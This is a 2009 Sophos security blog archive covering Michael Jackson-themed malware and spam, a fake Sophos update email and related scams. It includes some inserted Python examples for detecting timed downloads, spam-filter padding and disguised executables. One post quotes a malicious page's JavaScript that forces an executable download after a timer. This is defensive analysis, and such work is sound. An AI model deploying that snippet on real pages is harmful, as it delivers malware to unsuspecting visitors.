Sophos

Archive for June, 2009

International MJ Conspiracies With a Payload

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Mail Message

MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one: make sure JavaScript is disabled by default (so you don’t get infected by Mal/ObfJS-BP, found in the 1×1 iframe, which tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a bit more creative:

MJ Italian Video Message

For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

"Youtube" missing codec warning

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video, with a download link to the fake codec malware Troj/ZBot-GK. It also contains the following JavaScript code, which I found very interesting:


<!--
function doDownload() {
    // Genera il link al file zippato da scaricare
    // (tr. Generate the link to the zipped file to download)
    location.href = "http://youtube****.com/Codec/120.exe";
}

// Fa partire il download dopo 10 secondi da quando
// l’intermprete JavaScript ha rilevato la funzione
// (tr. The download starts 10 seconds after the JavaScript interpreter has taken over the function)
window.setTimeout("doDownload()", 4000);
//-->

This associated code essentially forces the linked codec to download and possibly run after ten seconds of inactivity on the page. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force download a zip file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.
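As an added example in Python (not code from the original post, and not the site’s own script), here is a small static scanner that pulls the timer delay and the executable URL out of a captured page like the one above, so an analyst can log what the page would have fetched without rendering it. The embedded sample is a constructed copy of the snippet, with the host masked as on the page.

```python
import re

# Constructed sample: the auto-download snippet quoted above, host masked as on the page.
SAMPLE_HTML = '''<script type="text/javascript">
<!--
function doDownload() {
    location.href = "http://youtube****.com/Codec/120.exe";
}
window.setTimeout("doDownload()", 4000);
//-->
</script>'''

# function name and body (assumes no nested braces inside the function body)
FUNC_RE = re.compile(r'function\s+(\w+)\s*\([^)]*\)\s*\{(.*?)\}', re.S)
# assignment that navigates the page: location.href = "..." / location = "..."
NAV_RE = re.compile(r'(?:window\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']')
# setTimeout("fn()", ms) or setTimeout(fn, ms)
TIMER_RE = re.compile(r'setTimeout\(\s*["\']?(\w+)\s*\(?\)?["\']?\s*,\s*(\d+)\s*\)')
RISKY_EXT = ('.exe', '.scr', '.zip', '.rar')

def find_timed_downloads(html):
    """Return (function, delay_ms, url) for every setTimeout that calls a
    function whose body navigates the page to a file with a risky extension."""
    nav_by_func = {}
    for name, body in FUNC_RE.findall(html):
        match = NAV_RE.search(body)
        if match:
            nav_by_func[name] = match.group(1)
    hits = []
    for func, delay in TIMER_RE.findall(html):
        url = nav_by_func.get(func)
        if url and url.lower().endswith(RISKY_EXT):
            hits.append((func, int(delay), url))
    return hits

if __name__ == "__main__":
    for func, delay, url in find_timed_downloads(SAMPLE_HTML):
        print(f"{func}() after {delay} ms -> {url}")
```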

You’re still safe as long as you keep JavaScript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than in the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.


Social networking and security

I saw yet another article today on the rise in cybercrime on Facebook: http://www.reuters.com/article/newsOne/idUSTRE55S55820090629

We’ve been talking about the dangers of Facebook and Twitter for a couple of years now [1], [2], [3], [4], [5], [6].

This seems to be bringing the argument for locking down business networks to prevent access to these sites back to the forefront. Previous arguments have usually been limited to productivity drains, but as malware on these sites rises, security should be the overriding concern. The potential for information leaks from employees posting to these sites is increasing, as is the possible damage from malware being sent from a corporation’s compromised network. And there’s still the whole cybersquatting issue, which also seems to be rising: there are companies that have been targeted with fake Facebook and Twitter profiles, which could potentially damage the company’s reputation.

With these considerations, should businesses lock down access to these sites at the risk of upsetting their employees?


“She’s armed with technology”

… but is she security conscious?

I was reading my RSS reader when I came across this blog article from the WSJ: http://blogs.wsj.com/digits/2009/06/26/how-moms-feel-about-social-media/?mod=rss_WSJBlog and it really got me thinking. How many of these sites have been set up securely? How many of these moms are putting up their private details not thinking about the possible consequences of what happens if the site gets compromised?

Many of these sites are set up by women (and men) with the best of intentions. They either have a bit of tech knowledge or they hire someone with the coding experience to set up the website. They make sure that they have some of the bells and whistles like private messaging, email lists, and message boards. The user interfaces are scrutinized to make sure they are user-friendly and easy to navigate. But how much attention is given to whether there are vulnerabilities in the server that is running the software? Who maintains the server and makes sure it’s patched and has AV on it? Is the software itself buggy and vulnerable to attack? Are they doing enough to protect their users?

Here’s a great example. I’m a member of several mom-centric social networks, one of which was in fact compromised. The servers had been compromised via an SQL injection attack. The hackers then trashed many of the templates for the site (fortunately they had decent backups and could restore the templates) and stole all the user information, including things like birthdays, usernames, passwords and email addresses. They sent a broadcast once control of the site was regained, but the damage was done. Every user had been compromised and their info was out in the world.

All except mine.

I never give correct personal details (such as birthdays) to websites. While I appreciate that in general such information is collected for demographic stats, there really is no need for specific birthdays, mother’s maiden names, etc. More people should really think about what it is they put on the enrollment forms. With a name, address and birthdate, identities can be stolen.

Security here is two-fold. Not only should the site be secure, but the people using it should also be wary: on the lookout for links from people they may or may not know, not giving out personal details, and using secure passwords that are not the same as their email or banking passwords.


Another Michael Jackson Scam

No doubt last week has been a very sad and depressing week for most people to learn of the passing of Michael Jackson.

Michael Jackson not only inspired millions of people through his music, but his tireless charity work gave hope to millions more around the world. He was a true humanitarian, and his ongoing contribution to society established him as one of the most charitable celebrities in the world. The loss of Michael Jackson devastated many people and left some feeling vulnerable, because to many people Michael Jackson was more than a celebrity: he was their inspiration.

Unfortunately, there is a small minority in society that seems to have no sympathy at all and unscrupulously plans to benefit from such a tragedy.

Shortly after the death of Michael Jackson, scammers started an online campaign to trick people into sending donations to the so-called “MICHAEL JACKSON ORGANIZATION”.

Below is an example of the scam email that we received (which had already been blocked by Sophos appliances):

It is sad to see how some people can use the death of another person as a profiteering tool. Everyone should be careful not to fall prey to these scammers and always be on the look out for these common online scams.


Scammers Targeting Dog Lovers

There have been (counting, countless, lost count) posts about the many permutations of scam found in spam. This post highlights another area scammers have gone into: a couple on a Christian mission whose puppy cannot cope with the African weather. I am sure there will be many dog lovers out there who will put their hand up to help.

Is the weather in Africa really that bad? Why is it always in Africa but not somewhere in China?


More Michael Jackson spam for the weekend

It has been a quiet and sunny Sunday afternoon here at SophosLabs Canada. With time on hand, I spent some time digging through the archives to see if any new Michael Jackson-related spam had arrived in the past few hours.

Here I will point out a few of the more interesting ones. There are the music, the meds, and the totally off-the-wall messages:

First up is a message that asks you to vote on “What killed Michael”:

In the message, a participant is supposed to get a free 7 album collection of Jackson’s songs for participating in the survey and “completing program requirements”. Just like the other “completing program requirements” spam messages, it’s likely there are hoops to jump through and purchases to engage in before there is any chance to receive the “free” items. Sadly, I am inclined to believe that there will be people out there who will try to participate in the survey to get the albums.

Next up is a spam message declaring that “Michael Jackson is not dead”:

This message has the hallmark of the image spam that has been so prevalent in recent days. In particular, the image of Michael Jackson has random, short, colored lines all over it, a trick often used to defeat antispam scanners. The curious will probably click on the image hoping to see evidence of Michael being alive. However, all that will do is take the surfer to a “Canadian Pharmacy” site selling the usual assortment of Viagra, Cialis and other pills. No evidence of Michael Jackson being alive. Sorry folks.

The last of the three messages is a “Rent your timeshare” spam:

So, what does this message have to do with Michael Jackson’s demise? The answer is in the source of the spam message:

The two circled text sections are Michael Jackson-related:

“Michael Jackson has hit the top of the pop singles chart”

“If any single song signaled that Michael Jacksons legacy as one of the top pop artists of all time would be secure, it was Billie Jean. The song remains a pop milestone and masterpiece. …”

As is commonly known in antispam circles, phrases from headline news and novels are regularly inserted into spam messages in order to defeat content- and probability-based antispam scanners. Other than the hidden mention of Michael Jackson, this is just another typical spam message.
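To show why inserted headline text works against a probability-based filter, here is an added Python example (not the post’s or SophosLabs’ code): a tiny naive Bayes classifier trained on a constructed six-message corpus, scoring the timeshare pitch before and after the two quoted Michael Jackson phrases are appended to it.

```python
import math
import re
from collections import Counter

# Constructed toy training corpus (not from the original post): three spam
# messages and three legitimate ones, far smaller than a real filter's data
# but enough to show the effect.
SPAM = [
    "rent your timeshare today special offer limited time",
    "rent timeshare cheap offer call now",
    "special offer cheap pills order now",
]
HAM = [
    "the song remains a pop milestone and a masterpiece of the era",
    "meeting notes attached see you tomorrow",
    "the quarterly report is ready please review the attached draft",
]

def tokens(text):
    return re.findall(r"[a-z]+", text.lower())

def train(spam, ham):
    spam_counts = Counter(t for m in spam for t in tokens(m))
    ham_counts = Counter(t for m in ham for t in tokens(m))
    vocab = set(spam_counts) | set(ham_counts)
    return spam_counts, ham_counts, vocab

def spam_probability(message, model):
    """Multinomial naive Bayes with Laplace smoothing and equal priors;
    returns P(spam | words) in (0, 1)."""
    spam_counts, ham_counts, vocab = model
    n_spam, n_ham, v = sum(spam_counts.values()), sum(ham_counts.values()), len(vocab)
    log_spam = log_ham = math.log(0.5)
    for t in tokens(message):
        # +1 smoothing: a word never seen in a class still gets a small probability
        log_spam += math.log((spam_counts[t] + 1) / (n_spam + v))
        log_ham += math.log((ham_counts[t] + 1) / (n_ham + v))
    return 1.0 / (1.0 + math.exp(log_ham - log_spam))

MODEL = train(SPAM, HAM)
PLAIN = "rent your timeshare special offer"
# The same pitch with the two headline phrases quoted in the post appended.
PADDED = PLAIN + (" michael jackson has hit the top of the pop singles chart"
                  " the song remains a pop milestone and masterpiece")

if __name__ == "__main__":
    print(f"plain  -> {spam_probability(PLAIN, MODEL):.3f}")   # about 0.998
    print(f"padded -> {spam_probability(PADDED, MODEL):.3f}")  # about 0.05
```

Every appended word the filter has seen in legitimate mail pulls the score toward ham, which is why the padding is drawn from text that looks like ordinary news rather than random noise.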

After digging through our spamtraps, there is still no evidence of large-volume spam campaigns involving the deceased pop icon. It remains to be seen how else spammers and malware authors will take advantage of this widespread and much-followed news.


Michael Jackson “breaking news video” distributes malware

As many expected, the death of the “King of Pop” Michael Jackson has given malware authors a new topic to entice users into installing malware.

Shortly after we detected the first spam message regarding Michael Jackson, the first malware related to his demise also arrived:

Michael Jackson malware spam

The body of the message is in Portuguese, which roughly translates into the following:

“The Los Angeles Times reported online that singer Michael Jackson died this Thursday (25th) at the age of 50. U.S. television networks CBS and ABC as well as the online versions of the New York Times and Variety magazine are also reporting the death of the singer. Citing sources from Los Angeles firefighters, Jackson suffered a cardiac arrest at his home, and was taken unconscious to the hospital.

Images of Michael Jackson’s body

Unpublished video not on-the-air yet.”

The image seems to be ripped from the entertainment biz show “Entertainment Tonight”, judging from the orange “T” at the bottom left corner. The actual link, however, goes to a .com.au site which asks the user to download the file “Michael.Jackson.videos.scr”. This file is detected by Sophos Anti-Virus as Troj/Dloadr-CPD.

Interestingly, the YouTube link at the very bottom is not hotlinked to any malware. If the link is pasted into a browser, it takes the audience to the music video of Michael Jackson’s hit “Thriller”.

Looking into our archives, we have not seen many samples of this malware spam, and distribution seems limited so far. However, it is likely that more Michael Jackson-themed malware and spam is on its way. Users are advised to be especially vigilant when they receive messages or links related to this news.


Warning: fake Sophos IDE update malware

We don’t have a great many details on this yet, but we’ve had limited reports of malware sent out claiming to be a security update for Sophos.

This is being sent out in email with the subject “Update your SOPHOS IDE scanner”. Attached to the email is a .rar file, or rather an EXE file pretending to be a .rar file. At this time, the filename was “SOPHOS IDE scanner.rar”. Please don’t run it: it will attempt to install malware on your system. Sophos updates should be obtained via the auto-update function of Sophos Anti-Virus, or by visiting http://www.sophos.com/downloads/ide/ . We never send identity data (IDEs) via email.

The body of the email looks like this:

“Download latest virus identity (IDE) files

If you are running an older version of Sophos Anti-Virus and do not automatically update your protection, you should download virus identity files (IDEs), which provide detection and disinfection of viruses, worms, Trojans and spyware.

All the IDEs you need are available in a single compressed file. NOTE: Please RUN the application accordingly.”

Note that this has been copied from the genuine Sophos download page and slightly altered, to give an air of authenticity.

It’s quite possible this is targeted at existing Sophos customers, but the payload will do bad things to anyone who runs it. If you’re sent one of these emails, please let us know, as this is quite recent and we’re not sure how widespread it is yet.

Sophos customers with HIPS enabled were protected from this new threat even before we had seen it.  The malicious payload of the email is now detected as Troj/Spoof-H, published in spoof-h.ide.
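An added Python example (not Sophos code) of the check a mail gateway would apply to an attachment like this one: compare the extension the filename claims with the file’s leading bytes, and flag a Windows PE executable that calls itself .rar. The sample bytes are constructed stand-ins, not the real attachment.

```python
import struct

# Leading bytes ("magic") of the two formats the attachment confuses.
RAR_MAGICS = (b"Rar!\x1a\x07\x00",        # RAR 4.x archive
              b"Rar!\x1a\x07\x01\x00")    # RAR 5 archive

def is_pe_executable(data):
    """True if data carries a Windows PE header: an 'MZ' DOS stub whose
    e_lfanew field (at offset 0x3C) points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"

def is_rar_archive(data):
    return any(data.startswith(magic) for magic in RAR_MAGICS)

def check_attachment(filename, data):
    """Compare the extension the filename claims with what the bytes say.
    Returns 'ok' when they agree, 'exe-disguised-as-<ext>' or
    'rar-with-wrong-extension' when they disagree, 'unknown' otherwise."""
    claimed = filename.lower().rsplit(".", 1)[-1]
    if is_pe_executable(data):
        return "ok" if claimed == "exe" else "exe-disguised-as-" + claimed
    if is_rar_archive(data):
        return "ok" if claimed == "rar" else "rar-with-wrong-extension"
    return "unknown"

# Constructed stand-ins (not the real attachment): a minimal PE-shaped blob
# whose e_lfanew points at offset 0x40, and a bare RAR 4 header.
FAKE_EXE = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
            + b"PE\x00\x00" + b"\x00" * 8)
FAKE_RAR = RAR_MAGICS[0] + b"\x00" * 16

if __name__ == "__main__":
    print(check_attachment("SOPHOS IDE scanner.rar", FAKE_EXE))  # exe-disguised-as-rar
    print(check_attachment("update.rar", FAKE_RAR))              # ok
```

A self-extracting archive is also a PE, so a gateway would normally treat any PE-shaped attachment as executable regardless of its name rather than trusting the extension.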


Michael Jackson’s Death Sparks Off Spam

The death of the “King of Pop”, Michael Jackson, spread great shock through the entire world.

About 8 hours after his demise, SophosLabs witnessed the first wave of spam messages employing the sad news in the subject line and body to harvest victims’ email addresses.

In this kind of spam message, the spammer claims he or she has vital information about the death of Michael Jackson to share with somebody, i.e. you.

The body of the spam message does not contain any call-to-action link such as a URL, an email address or a phone number, and the From address of the message is bogus.

But the spammer can still harvest recipients’ email addresses via a free, live email address if the spam message is replied to.

If you get this message, just delete it! Please do not respond!


An Obvious Opportunity

It’s unfortunate that whenever a celebrity of any sort dies, scammers rejoice as they have new material that they can be certain will give them a boost in traffic to their sites.

Take today’s hot topic for example. The well-known actress Farrah Fawcett passed away after a long battle with cancer.

Looking at the Google Trends data we can see that nearly a dozen of the top 100 searched terms today have involved the words “Farrah Fawcett”. What this translates to in the eyes of scammers is a better opportunity to have you click one of their sites which redirects you to their own FakeAV site in an attempt to get your money.

Doing a quick Google search for the words “Farrah Fawcett Dead” turns up the following link on the first page of results.

Visiting the link with a Firefox add-on such as NoScript allows us to prevent the immediate redirection to the FakeAV site, and instead we’re greeted with a page that looks like this.

Anyone who tries making sense of the text will quickly realize that it’s a list of random dictionary words strung together to make it seem like a real site. Of course, they never actually intend for you to see the page, since there’s some script code that redirects you to the common FakeAV page seen all over the web. If you weren’t running an add-on such as NoScript, you’d see the following page.

It’s important to keep in mind that whenever a hot news topic pops up, there are people out there trying to take advantage of the situation. Stick to known news sites you are familiar with and be sure to keep your anti-virus software up to date.